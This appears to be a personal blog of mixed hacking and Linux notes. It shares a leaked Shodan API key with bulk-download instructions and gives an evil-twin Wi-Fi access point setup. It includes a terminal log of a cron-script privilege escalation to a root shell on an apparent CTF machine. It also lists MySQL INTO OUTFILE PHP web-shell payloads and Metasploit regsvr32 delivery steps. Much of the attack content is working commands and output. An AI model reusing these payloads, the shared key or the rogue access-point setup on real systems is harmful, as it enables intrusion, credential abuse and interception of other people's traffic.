Thursday, July 8, 2021

C programming Loads

 PreProssing
gcc -E -P cube-prog.c -o cube-prog.i
Compilation
gcc -S cube-prog.i -o cube-prog.s
Assembly
gcc -c cube-prog.s -o cube-prog.o

 

 

C Programming in One Hour a Day, Sams Teach Yourself 7th Edition

 

at No comments:

Sunday, July 4, 2021

Shodan 

Greetings to all, I am spreading the shodan key for 200k credits, I think many are looking for this key and many will be useful! a key without a limit for activation, even though the entire forum can activate and use ... Profitable use for everyone!
CLI installation -> pip install -U --user shodan -> after in the terminal ---> shodan init PSKINdQe1GyxGgecYz2191H2JoS9qvgD -> after we check shodan info -> after we make sure that there are 200k credits on board ..
example of downloading from shodan as well as parsing of ipishek:
let's say we are looking for BigIp
1) shodan download --limit 50000 bigip.json.gz bigip -> download starts
2) gzip -d bigip.json.gz -> unpack gzip archive
3) shodan parse bigip.json --fields = ip_str, port> bigip.txt & no ports --fields = ip_str> bigip.txt
4) you can use all kinds of filters, let's say shodan download --limit 50000 bigip.json.gz bigip country: "US", etc.

Thank you all for your attention! Have a nice day, everyone!

at No comments:

linux kernal; Update and debug

 sudo update-initramfs -k all -c

at No comments:

Thursday, July 1, 2021

adsds

 python3 -m pip install python-telegram
from telegram.client import Telegram

tg = Telegram(
    api_id='YOUR API ID',
    api_hash='YOUR API HASH',
    phone='+575555555555',
    database_encryption_key='changeme1234',
)

tg.login()


response = tg.call_method('importContacts', {
    'contacts': [
        {'phone_number': '+57 555 123 4567'},
    ]
})

response.wait()

user_ids = response.update['user_ids']

if user_ids[0] == 0:
    print('This contact is NOT using Telegram.')
else:
    print(f'¡This contact({user_ids[0]}) uses Telegram!')

 

magnet:?xt=urn:btih:209922c98ec03a2cbf0eebe631f9c1d577795645&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso 


https://drive.google.com/file/d/1CyzXKD3uy14-FUCdSM5cO968zL2JLly2/view

at No comments:

Sunday, June 27, 2021

Hping3

 hping3
--------------------------------------------------------

hping send {ip(daddr=192.168.56.1)+icmp(type8 code=0}

tcpdump -i wlan0

=========================================================

foreach i [list 5 6 7 8 9 10] {hping send "ip(daddr=192.168.56.1,ttl=$i)+icmp(type=8,code=0)"}
sudo tcpdump -i waln0 -x -vv | grep ICMP

============================================================

while 1{
set p [lindex [hping recv eth0]0]
puts "[hping getfield ip saddr $p]-> hping getfield ip ttl $p]"
}

===============================================================
sudo vi attack.sig
sudo hping3 -2 -p 500 192.168.56.1 -d 137 -E attack.sig


 wiresharl upd.port==500 icmp
tcpdump -i wlan0 -nX

at No comments:

Saturday, June 26, 2021

Sys Admin

 https://riptutorial.com/linux/awesome-learning/course

 

nmap 192.168.1.6 -oX log.xml

xsltproc -o log.html log.xml

at No comments:

Friday, June 25, 2021

Terminal Note

 --------------

Shows all the hidden directory

1.  ls -d .[!.]?* 


=====

Shortcut key 

CTRL+A = Move Backward
CTRL+E = Move Forward
CTRL+F = Move Forward One step @ time
CTRL+B = Move Backward One set @ time
CTRL+D = Delete a Character
CTRL+W = Delete a word
CTRL+T = Switch the 2 letter
ALT+U = Upper
ALT+L = lower


at No comments:

Tuesday, June 22, 2021

SSH TUNNELING

 mkfifo /tmp/packet_capture

tcpdumb -i <current interface add> -w - | shh [Destination Name]@[Destination ip]  -c [Encryption] -C -p 22 "cat - > /tmp/packet_capture"

Example:

tcpdump -i enp0s3 -w - | ssh admin@192.168.1.3 -c arcfour,blowfish-cbc -C -p 22 " cat - > /tmp/packet_capture

at No comments:

Saturday, June 19, 2021

hacking tips

-------------------------------------------
-----------#monitor mode--------------------
sudo ip link set wlan1 down
sudo iw dev wlan1 set type monitor
sudo ip link set wlan1 up
-------------------------------------------
-----------#install tool--------------------
apt-get install hostapd dnsmasq apache2 aircrack-ng
-----------#checking the monitor mode-------
sudo airodump-ng wlan1
--------------------------------------------
-----------#setup IP for Interface----------
sudo ip link set wlan1 down
sudo ifconfig wlan1 up 192.168.0.1 netmask 255.255.255.0
sudo route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
sudo ip link set wlan1 up
---------------------------------------------
------------#configure dnsmasq.conf----------
interface-wlan1
dhcp-range=192.168.0.2,192.168.0.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.0.1
dhcp-option=6, 192.168.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
---------------------------------------------
interface=wlan1                                                                
driver=nl80211
ssid=JOiNed to be hacked
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
------------------------------------------------------
#Prevent from DNS clinent running
sudo ss -lp "sport = :domain"
sudo systemctl stop systemd-resolved

#creating firewall
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface wlan1 -j ACCEPT
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface wlan1 -j ACCEPT
#ip forwarding
sudo echo 1 > /proc/sys/net/ipv4/ip forward
sudo sysctl net.ipv4.ip_forward=1

=================================
sudo dnsmasq -C dnsmasq.conf -d
sudo hostapd /etc/hostapd.conf
---------------------------------
sudo systemctl unmask systemd-resolved
sudo systemctl enable systemd-resolved

sudo lsof -i -P -n | grep LIST
 ----------------------------------------------

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

at No comments:

Saturday, June 12, 2021

Findibg the Domain and Sub-domains



- subbrute.py
- nmap --script dns-brute
- dnsmap
- fierce -dns
- sublister

Finding similar domain

- urlcrazy -p

 sudo nmap --traceroute --script traceroute-geolocation www.google.com



 


 












 
 
 
 
 
 


 








at No comments:
Labels:

Tuesday, May 25, 2021

Crontab priv esca

 www-data@red:/etc$ ls -la cron*
ls -la cron*
-rw-r--r-- 1 root root  722 Apr  5  2016 crontab

cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php

cron.daily:
total 56
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root   920 Apr  5  2016 apt-compat
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  6  2015 logrotate
-rwxr-xr-x   1 root root   539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root   383 Mar  8  2016 samba
-rwxr-xr-x   1 root root   214 Apr 12  2016 update-notifier-common

cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root   211 Apr 12  2016 update-notifier-common
www-data@red:/etc$ cd cron.d    
cd cron.d
www-data@red:/etc/cron.d$ ls
ls
logrotate  mdadm  php
www-data@red:/etc/cron.d$ ls -la
ls -la
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php
www-data@red:/etc/cron.d$ cd logrotate
cd logrotate
bash: cd: logrotate: Not a directory
www-data@red:/etc/cron.d$ cat logrotate
cat logrotate
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc/cron.d$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc/cron.d$ cd ..
cd ..
www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh
<d root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh               
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit
www-data@red:/etc$ cd
cd
bash: cd: HOME not set
www-data@red:/etc$ cd ..
cd ..
www-data@red:/$ /tmp/exploit -p
/tmp/exploit -p
# cd /root
cd /root
# ls
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql

at No comments:

mysql priv escalation

 For window >>>

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 For Linux 
Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";



msf6 > search regsvr32

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/server/regsvr32_command_delivery_server                   normal  No     Regsvr32.exe (.sct) Command Delivery Server
   1  exploit/multi/script/web_delivery                  2013-07-19       manual  No     Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 0
msf6 auxiliary(server/regsvr32_command_delivery_server) > show options

Module options (auxiliary/server/regsvr32_command_delivery_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD                       no        The command to execute
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVPORT 4444
SRVPORT => 4444

at No comments:

installlation of wpscan

  1) To install ruby, type : sudo apt install ruby 

 2) To install dependencies for building extensions, type: sudo apt install build-essential libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev libgmp-dev zlib1g-dev 

3) To install WPScan, type: sudo gem install wpscan

at No comments:
Subscribe to: Comments (Atom)